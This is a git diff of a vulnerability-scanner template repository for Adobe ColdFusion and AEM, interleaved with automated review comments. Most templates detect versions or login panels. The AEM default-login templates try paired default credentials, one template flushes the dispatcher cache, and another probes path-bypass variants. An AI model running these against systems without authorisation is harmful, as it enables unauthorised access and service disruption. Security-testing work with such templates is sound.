./poc/xss/wp-slideshow-xss-11576.yaml ./poc/xss/wp-slideshow-xss.yaml 
@@ -104922,6 +104913,7 @@ ./poc/xss/wp-socialfit-xss-11582.yaml ./poc/xss/wp-socialfit-xss.yaml ./poc/xss/wp-whmcs-xss-11613.yaml +./poc/xss/wp-whmcs-xss-11614.yaml ./poc/xss/wp-whmcs-xss.yaml ./poc/xss/wpmudev-my-calender-xss-11503.yaml ./poc/xss/wpmudev-my-calender-xss.yaml diff --git a/poc/adobe/adobe-coldfusion-detect-82.yaml b/poc/adobe/adobe-coldfusion-detect-82.yaml deleted file mode 100644 index 0d9330c87c..0000000000 --- a/poc/adobe/adobe-coldfusion-detect-82.yaml +++ /dev/null 
@@ -1,62 +0,0 @@ -id: adobe-coldfusion-detect - -info: - name: Adobe ColdFusion Detector - author: philippedelteil - severity: info - description: With this template we can detect the version number of Coldfusion instances based on their logos. - tags: adobe,coldfusion - -requests: - - method: GET - path: - - "{{BaseURL}}/CFIDE/administrator/images/mx_login.gif" - - "{{BaseURL}}/cfide/administrator/images/mx_login.gif" - - "{{BaseURL}}/CFIDE/administrator/images/background.jpg" - - "{{BaseURL}}/cfide/administrator/images/background.jpg" - - "{{BaseURL}}/CFIDE/administrator/images/componentutilslogin.jpg" - - "{{BaseURL}}/cfide/administrator/images/componentutilslogin.jpg" - - redirects: true - stop-at-first-match: true - max-redirects: 2 - matchers: - - type: dsl - name: "coldfusion-8" - dsl: - - "status_code==200 && (\"da07693b70ddbac5bc0d8bf98d4a3539\" == md5(body))" - - - type: dsl - name: "coldfusion-9" - dsl: - - "status_code==200 && (\"c0757351b00f7ecf35a035c976068d12\" == md5(body))" - - - type: dsl - name: "coldfusion-10" - dsl: - - "status_code==200 && (\"a4c81b7a6289b2fc9b36848fa0cae83c\" == md5(body))" - - - type: dsl - name: "coldfusion-11" - dsl: - - "status_code==200 && (\"7f024de9f480481ca03049e0d66679d6\" == md5(body))" - - - type: dsl - name: "coldfusion-2016" - dsl: - - "status_code==200 && (\"f1281b6866aef66e35dc36fe4f0bf990\" == md5(body))" - - - type: dsl - name: "coldfusion-2021" - dsl: - - "status_code==200 && (\"a88530d7f1980412dac076de732a4e86\" == md5(body))" - - - type: dsl - name: "coldfusion-2018" - dsl: - - "status_code==200 && (\"92ef6ee3c4d1700e3cca797b19d3e7ba\" == md5(body))" - - - type: dsl - name: "coldfusion-mx-7" - dsl: - - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" diff --git a/poc/adobe/adobe-coldfusion-detect-83.yaml b/poc/adobe/adobe-coldfusion-detect-83.yaml index e19f7d4be2..8bd7130d99 100644 --- a/poc/adobe/adobe-coldfusion-detect-83.yaml +++ b/poc/adobe/adobe-coldfusion-detect-83.yaml 
@@ -7,11 +7,10 @@ info: description: With this template we can detect the version number of Coldfusion instances based on their logos. metadata: verified: true - max-request: 6 shodan-query: http.component:"Adobe ColdFusion" - tags: adobe,coldfusion,tech + tags: adobe,coldfusion -http: +requests: - method: GET path: - "{{BaseURL}}/CFIDE/administrator/images/mx_login.gif" @@ -21,7 +20,7 @@ http: - "{{BaseURL}}/CFIDE/administrator/images/componentutilslogin.jpg" - "{{BaseURL}}/cfide/administrator/images/componentutilslogin.jpg" - host-redirects: true + redirects: true stop-at-first-match: true max-redirects: 2 matchers: @@ -64,5 +63,3 @@ http: name: "coldfusion-mx-7" dsl: - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" - -# digest: 4a0a00473045022100faa12701b8bc27ab386795db36e16861a6a66b66d8fb9cd15ac80cb9409141df02205a53027693929221e1489f3e72cf8d72c2b6061ffced415bc66e005548780060:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/adobe-coldfusion-error-detect-86.yaml b/poc/adobe/adobe-coldfusion-error-detect-86.yaml new file mode 100644 index 0000000000..57e6f15254 --- /dev/null +++ b/poc/adobe/adobe-coldfusion-error-detect-86.yaml @@ -0,0 +1,29 @@ +id: adobe-coldfusion-error-detect + +info: + name: Adobe ColdFusion Detector + author: philippedelteil + severity: info + description: With this template we can detect a running ColdFusion instance due to an error page. + reference: + - https://twitter.com/PhilippeDelteil/status/1418622775829348358 + metadata: + verified: true + shodan-query: http.component:"Adobe ColdFusion" + tags: adobe,coldfusion + +requests: + - method: GET + path: + - "{{BaseURL}}/_something_.cfm" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ColdFusion documentation' + + - type: status + status: + - 404 
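Review bot: The second hunk of adobe-coldfusion-detect-83.yaml swaps `host-redirects: true` for `redirects: true`, which lets the logo requests follow a redirect to a different host, so an MD5 match can be reported against a target that did not serve the image itself. I would keep `host-redirects: true` and leave `max-redirects: 2` as it is. The first and third hunks also revert `http:` to the legacy `requests:` key and delete the `# digest:` line, leaving the template unsigned; the same reverts appear in aem-cached-pages.yaml and aem-default-login-141.yaml further down. The matcher list sits between the hunks and is only partly visible here.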
diff --git a/poc/adobe/adobe-coldfusion-error-detect-88.yaml b/poc/adobe/adobe-coldfusion-error-detect.yaml
similarity index 100%
rename from poc/adobe/adobe-coldfusion-error-detect-88.yaml
rename to poc/adobe/adobe-coldfusion-error-detect.yaml
diff --git a/poc/adobe/adobe-component-login-89.yaml b/poc/adobe/adobe-component-login-89.yaml
new file mode 100644
index 0000000000..9b423f9a58
--- /dev/null
+++ b/poc/adobe/adobe-component-login-89.yaml
@@ -0,0 +1,32 @@
+id: adobe-coldfusion-login
+
+info:
+ name: Adobe ColdFusion Component Browser Login Panel
+ author: dhiyaneshDK
+ description: An Adobe ColdFusion Component Browser login panel was detected.
+ severity: info
+ reference:
+ - https://www.exploit-db.com/ghdb/6846
+ tags: panel,adobe,coldfusion
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0.0
+ cve-id:
+ cwe-id: CWE-200
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/CFIDE/componentutils/login.cfm'
+ - '{{BaseURL}}/cfide/componentutils/login.cfm'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Component Browser Login'
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/20
diff --git a/poc/adobe/adobe-component-login-90.yaml b/poc/adobe/adobe-component-login-90.yaml
deleted file mode 100644
index 1d46e94118..0000000000
--- a/poc/adobe/adobe-component-login-90.yaml
+++ /dev/null
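Review bot: adobe-component-login-89.yaml duplicates adobe-component-login-91.yaml, which this commit also adds: both request the same two `componentutils/login.cfm` paths and match `Component Browser Login` with status 200, but under different ids (`adobe-coldfusion-login` here, `adobe-component-login` there). One exposed panel would therefore be reported at least twice, under two names. Keeping a single file with one id would avoid that. In the `classification` block the empty `cve-id:` key parses as null and can be dropped; the same empty key is added in the adobe-experience-manager-login-109.yaml hunk.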
@@ -1,31 +0,0 @@ -id: adobe-coldfusion-login - -info: - name: Adobe ColdFusion Component Browser Login Panel - author: dhiyaneshDK - severity: info - description: An Adobe ColdFusion Component Browser login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6846 - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.component:"Adobe ColdFusion" - tags: panel,adobe,coldfusion - -requests: - - method: GET - path: - - '{{BaseURL}}/CFIDE/componentutils/login.cfm' - - '{{BaseURL}}/cfide/componentutils/login.cfm' - - matchers-condition: and - matchers: - - type: word - words: - - 'Component Browser Login' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-component-login-91.yaml b/poc/adobe/adobe-component-login-91.yaml new file mode 100644 index 0000000000..c0042aed5b --- /dev/null +++ b/poc/adobe/adobe-component-login-91.yaml @@ -0,0 +1,23 @@ +id: adobe-component-login + +info: + name: Adobe Component Browser Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6846 + tags: panel,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/componentutils/login.cfm' + - '{{BaseURL}}/cfide/componentutils/login.cfm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Component Browser Login' + - type: status + status: + - 200 diff --git a/poc/adobe/adobe-component-login-92.yaml b/poc/adobe/adobe-component-login-92.yaml index cf0a6e2a19..cc39191db5 100644 --- a/poc/adobe/adobe-component-login-92.yaml +++ b/poc/adobe/adobe-component-login-92.yaml 
@@ -1,17 +1,15 @@ id: adobe-component-login - info: - name: Adobe Component Brower Login + name: Adobe Component Browser Login author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6846 - tags: panel - + tags: panel,adobe requests: - method: GET path: - '{{BaseURL}}/CFIDE/componentutils/login.cfm' - + - '{{BaseURL}}/cfide/componentutils/login.cfm' matchers-condition: and matchers: - type: word diff --git a/poc/adobe/adobe-connect-central-login-93.yaml b/poc/adobe/adobe-connect-central-login-96.yaml similarity index 100% rename from poc/adobe/adobe-connect-central-login-93.yaml rename to poc/adobe/adobe-connect-central-login-96.yaml diff --git a/poc/adobe/adobe-connect-username-exposure-100.yaml b/poc/adobe/adobe-connect-username-exposure-100.yaml deleted file mode 100644 index 2e4d3089a9..0000000000 --- a/poc/adobe/adobe-connect-username-exposure-100.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: adobe-connect-username-exposure - -info: - name: Adobe Connect Username Exposure - author: dhiyaneshDk - severity: low - reference: - - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - tags: adobe,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/system/help/support" - - matchers-condition: and - matchers: - - type: word - words: - - 'Administrators name:' - - 'Support Administrators email address:' - part: body - condition: and - - - type: status - status: - - 200 diff --git a/poc/adobe/adobe-connect-username-exposure-101.yaml b/poc/adobe/adobe-connect-username-exposure-101.yaml index e47b4fe88b..088b39ad5e 100644 --- a/poc/adobe/adobe-connect-username-exposure-101.yaml +++ b/poc/adobe/adobe-connect-username-exposure-101.yaml 
@@ -1,26 +1,26 @@ -id: adobe-connect-username-exposure - -info: - name: Adobe Connect Username Exposure - reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - author: dhiyaneshDk - severity: low - tags: adobe,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/system/help/support" - - matchers-condition: and - matchers: - - type: word - words: - - 'Administrators name:' - - 'Support Administrators email address:' - part: body - condition: and - - - type: status - status: - - 200 +id: adobe-connect-username-exposure + +info: + name: Adobe Connect Username Exposure + reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html + author: dhiyaneshDk + severity: low + tags: adobe,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/system/help/support" + + matchers-condition: and + matchers: + - type: word + words: + - 'Administrators name:' + - 'Support Administrators email address:' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/adobe/adobe-connect-username-exposure-98.yaml b/poc/adobe/adobe-connect-username-exposure-98.yaml index 088b39ad5e..2e4d3089a9 100644 --- a/poc/adobe/adobe-connect-username-exposure-98.yaml +++ b/poc/adobe/adobe-connect-username-exposure-98.yaml @@ -2,9 +2,10 @@ id: adobe-connect-username-exposure info: name: Adobe Connect Username Exposure - reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html author: dhiyaneshDk severity: low + reference: + - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html tags: adobe,disclosure requests: diff --git a/poc/adobe/adobe-connect-version-104.yaml b/poc/adobe/adobe-connect-version-104.yaml deleted file mode 100644 index 95b454f2f8..0000000000 --- a/poc/adobe/adobe-connect-version-104.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: adobe-connect-version - -info: - name: Adobe Connect Central Version - author: dhiyaneshDk - severity: info - metadata: - max-request: 1 - tags: adobe,misconfig - -http: - - method: GET - path: - - "{{BaseURL}}/version.txt" - - matchers-condition: and - matchers: - - type: word - words: - - 'package=' - part: body - - - type: word - words: - - 'text/plain' - part: header - - - type: status - status: - - 200 - -# digest: 4a0a00473045022100e63b3b76732fe722d3d76c704705f5f1fdab83c771742ce8a0f8cd2ed2fa2e5c022053f49fe20114fce1d298f13d19d4b25108498ca1d7f3591f4c6cd033205b4d09:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/adobe-connect-version-102.yaml b/poc/adobe/adobe-connect-version.yaml similarity index 100% rename from poc/adobe/adobe-connect-version-102.yaml rename to poc/adobe/adobe-connect-version.yaml diff --git a/poc/adobe/adobe-experience-manager-login-105.yaml b/poc/adobe/adobe-experience-manager-login-105.yaml deleted file mode 100644 index 4dbdef1e18..0000000000 --- a/poc/adobe/adobe-experience-manager-login-105.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: adobe-experience-manager-login - -info: - name: Adobe Experience Manager Login Panel - author: dhiyaneshDK - description: An Adobe Experience Manager login panel was detected. - severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 - - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html - tags: panel,aem,adobe - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/libs/granite/core/content/login.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'AEM Sign In' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 
diff --git a/poc/adobe/adobe-experience-manager-login-106.yaml b/poc/adobe/adobe-experience-manager-login-106.yaml new file mode 100644 index 0000000000..2162a6646f --- /dev/null +++ b/poc/adobe/adobe-experience-manager-login-106.yaml @@ -0,0 +1,23 @@ +id: adobe-experience-manager-login + +info: + name: Adobe-Experience-Manager + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 + tags: panel,aem,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}/libs/granite/core/content/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'AEM Sign In' + + - type: status + status: + - 200 diff --git a/poc/adobe/adobe-experience-manager-login-109.yaml b/poc/adobe/adobe-experience-manager-login-109.yaml index 9148cd29f0..4dbdef1e18 100644 --- a/poc/adobe/adobe-experience-manager-login-109.yaml +++ b/poc/adobe/adobe-experience-manager-login-109.yaml @@ -3,15 +3,17 @@ id: adobe-experience-manager-login info: name: Adobe Experience Manager Login Panel author: dhiyaneshDK - severity: info description: An Adobe Experience Manager login panel was detected. + severity: info reference: + - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html + tags: panel,aem,adobe classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: cwe-id: CWE-200 - metadata: - shodan-query: http.title:"AEM Sign In" - tags: panel,aem,adobe requests: - method: GET diff --git a/poc/adobe/adobe-media-server-114.yaml b/poc/adobe/adobe-media-server-114.yaml new file mode 100644 index 0000000000..deaf55913a --- /dev/null +++ b/poc/adobe/adobe-media-server-114.yaml 
@@ -0,0 +1,23 @@ +id: adobe-media-server + +info: + name: Adobe Media Server + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 + tags: panel,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Adobe Media Server' + + - type: status + status: + - 200 diff --git a/poc/adobe/adobe-media-server-115.yaml b/poc/adobe/adobe-media-server-115.yaml index deaf55913a..2ee6efc2c8 100644 --- a/poc/adobe/adobe-media-server-115.yaml +++ b/poc/adobe/adobe-media-server-115.yaml @@ -1,10 +1,15 @@ id: adobe-media-server info: - name: Adobe Media Server + name: Adobe Media Server Login Panel author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 + description: An Adobe Media Server login panel was detected. + reference: + - https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 + - https://helpx.adobe.com/support/adobe-media-server.html + classification: + cwe-id: CWE-200 tags: panel,adobe requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-media-server.yaml b/poc/adobe/adobe-media-server.yaml deleted file mode 100644 index 2ee6efc2c8..0000000000 --- a/poc/adobe/adobe-media-server.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: adobe-media-server - -info: - name: Adobe Media Server Login Panel - author: dhiyaneshDK - severity: info - description: An Adobe Media Server login panel was detected. - reference: - - https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 - - https://helpx.adobe.com/support/adobe-media-server.html - classification: - cwe-id: CWE-200 - tags: panel,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'Adobe Media Server' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/aem-bg-servlet-129.yaml b/poc/adobe/aem-bg-servlet-129.yaml deleted file mode 100644 index b751c4f52a..0000000000 --- a/poc/adobe/aem-bg-servlet-129.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: aem-bg-servlet - -info: - name: AEM BG-Servlets - author: DhiyaneshDk - severity: info - reference: - - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig - -http: - - method: GET - path: - - '{{BaseURL}}/system/bgservlets/test.css' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '
Flushing output
' - -# digest: 4a0a00473045022011679f68ea9ea8736dfbf616cd843e2cd2a218f0f4d79653b8e1b3f66e88310a022100e65d71edf92b948507e7fd6c201b5804ca45fc3c262753fe9804347322869acf:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-bg-servlet.yaml b/poc/adobe/aem-bg-servlet.yaml new file mode 100644 index 0000000000..6a3c2a07b3 --- /dev/null +++ b/poc/adobe/aem-bg-servlet.yaml @@ -0,0 +1,24 @@ +id: aem-bg-servlet + +info: + name: AEM BG-Servlets + author: DhiyaneshDk + severity: info + reference: + - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 + tags: aem + +requests: + - method: GET + path: + - '{{BaseURL}}/system/bgservlets/test.css' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '
Flushing output
' \ No newline at end of file diff --git a/poc/adobe/aem-cached-pages.yaml b/poc/adobe/aem-cached-pages.yaml index cba756b341..6a36c8d2b3 100644 --- a/poc/adobe/aem-cached-pages.yaml +++ b/poc/adobe/aem-cached-pages.yaml @@ -4,31 +4,22 @@ info: name: Invalidate / Flush Cached Pages on AEM author: hetroublemakr severity: low - reference: - - https://twitter.com/AEMSecurity/status/1244965623689609217 - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig + tags: aem + reference: https://twitter.com/AEMSecurity/status/1244965623689609217 -http: +requests: - method: GET path: - "{{BaseURL}}/dispatcher/invalidate.cache" - headers: CQ-Handle: /content CQ-Path: /content - matchers-condition: and matchers: - type: word - part: body words: - "

OK

" - + part: body - type: status status: - 200 - -# digest: 4a0a00473045022100fa449369a6b6a19ef08cfa7a83f341000fcbeff5f0fe0b11f236a2463c6fc27802204261447eae5853abfbe57ff0be79318ab2cb59f47717c548474bb6f5e8225959:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-default-get-servlet-137.yaml b/poc/adobe/aem-default-get-servlet-135.yaml similarity index 100% rename from poc/adobe/aem-default-get-servlet-137.yaml rename to poc/adobe/aem-default-get-servlet-135.yaml diff --git a/poc/adobe/aem-default-login-140.yaml b/poc/adobe/aem-default-login-140.yaml deleted file mode 100644 index 8072025a73..0000000000 --- a/poc/adobe/aem-default-login-140.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: aem-default-login - -info: - name: Adobe AEM Default Login - author: random-robbie - severity: high - description: Adobe AEM default login credentials were discovered. - reference: - - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: aem,default-login,adobe - - -requests: - - raw: - - | - POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Origin: {{BaseURL}} - Referer: {{BaseURL}}/libs/granite/core/content/login.html - - _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true - - attack: pitchfork - payloads: - aem_user: - - admin - - grios - - replication-receiver - - vgnadmin - - aem_pass: - - admin - - password - - replication-receiver - - vgnadmin - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - condition: and - words: - - login-token - - crx.default - -# Enhanced by mp on 2022/03/23 
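Review bot: aem-cached-pages.yaml is not a passive check: the request it keeps (`/dispatcher/invalidate.cache` with `CQ-Handle: /content`) asks the dispatcher to flush cached pages, and the new `tags: aem` gives operators nothing to filter it out of a routine scan. I would tag it `tags: aem,misconfig,intrusive` so it can be excluded by tag on production targets. The hunk also drops the `metadata` block, reverts `http:` to `requests:` and removes the `# digest:` line. The template's `id` line is above the hunk and the body matcher text is garbled in this view, so the matcher itself is not reviewed.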
diff --git a/poc/adobe/aem-default-login-141.yaml b/poc/adobe/aem-default-login-141.yaml index 30c718c891..66a6189c19 100644 --- a/poc/adobe/aem-default-login-141.yaml +++ b/poc/adobe/aem-default-login-141.yaml @@ -12,11 +12,10 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 8 shodan-query: http.component:"Adobe Experience Manager" tags: aem,default-login,adobe -http: +requests: - raw: - | POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 @@ -38,6 +37,7 @@ http: - anonymous - jdoe@geometrixx.info - aparker@geometrixx.info + aem_pass: - admin - password @@ -47,8 +47,8 @@ http: - anonymous - jdoe - aparker - stop-at-first-match: true + stop-at-first-match: true matchers-condition: and matchers: - type: status @@ -62,4 +62,4 @@ http: - crx.default condition: and -# digest: 4a0a004730450220222a3b892a7451300a85043c153a1fbe5d336d8c9f30c474065214bbac5906bc022100981335810687d458df2fb4ca0c7698ec9597777f599956f12f0a62b18f285727:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/23 diff --git a/poc/adobe/aem-default-login-142.yaml b/poc/adobe/aem-default-login-142.yaml index 0f201e7c6b..8072025a73 100644 --- a/poc/adobe/aem-default-login-142.yaml +++ b/poc/adobe/aem-default-login-142.yaml @@ -3,9 +3,17 @@ id: aem-default-login info: name: Adobe AEM Default Login author: random-robbie - severity: critical + severity: high + description: Adobe AEM default login credentials were discovered. + reference: + - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: aem,default-login,adobe + requests: - raw: - | @@ -44,3 +52,5 @@ requests: words: - login-token - crx.default + +# Enhanced by mp on 2022/03/23 diff --git a/poc/adobe/aem-gql-servlet-149.yaml b/poc/adobe/aem-gql-servlet-149.yaml deleted file mode 100644 index 977dc70f75..0000000000 
--- a/poc/adobe/aem-gql-servlet-149.yaml
+++ /dev/null
@@ -1,56 +0,0 @@ -id: aem-gql-servlet - -info: - name: AEM GQLServlet - author: dhiyaneshDk,prettyboyaaditya - severity: low - reference: - - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html - tags: aem - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico' - - '{{BaseURL}}/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix=' - - 
'{{BaseURL}}///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix=' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'excerpt' - - 'path' - - 'hits' - condition: and diff --git a/poc/adobe/aem-gql-servlet-150.yaml b/poc/adobe/aem-gql-servlet-150.yaml new file mode 100644 index 0000000000..36a597b300 --- /dev/null +++ b/poc/adobe/aem-gql-servlet-150.yaml 
@@ -0,0 +1,26 @@ +id: aem-gql-servlet + +info: + author: DhiyaneshDk + name: AEM GQLServlet + severity: low + reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html + tags: aem + + +requests: + - method: GET + path: + - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'excerpt' + - 'path' + - 'hits' + condition: and diff --git a/poc/adobe/aem-groovyconsole-154.yaml b/poc/adobe/aem-groovyconsole-154.yaml deleted file mode 100644 index c53445d395..0000000000 --- a/poc/adobe/aem-groovyconsole-154.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: aem-groovyconsole -info: - name: AEM Groovy console enabled - author: twitter.com/Dheerajmadhukar - severity: critical - description: Groovy console is exposed, RCE is possible. - reference: https://hackerone.com/reports/672243 - tags: aem -requests: - - method: GET - path: - - "{{BaseURL}}/groovyconsole" - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9,hi;q=0.8 - User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 - matchers-condition: and - matchers: - - type: word - words: - - "Groovy Console" - - "Run Script" - - "Groovy Web Console" - part: body - condition: and - - type: status - status: - - 200 diff --git a/poc/adobe/aem-groovyconsole-155.yaml b/poc/adobe/aem-groovyconsole-155.yaml index 9709becc71..c53445d395 100644 --- a/poc/adobe/aem-groovyconsole-155.yaml +++ b/poc/adobe/aem-groovyconsole-155.yaml 
